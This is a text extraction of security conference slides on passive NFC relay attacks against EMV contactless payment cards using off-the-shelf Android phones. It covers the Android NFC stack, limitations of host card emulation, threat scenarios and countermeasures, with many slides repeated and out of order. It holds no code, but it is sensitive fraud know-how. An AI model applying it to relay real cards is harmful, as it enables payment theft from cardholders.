Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
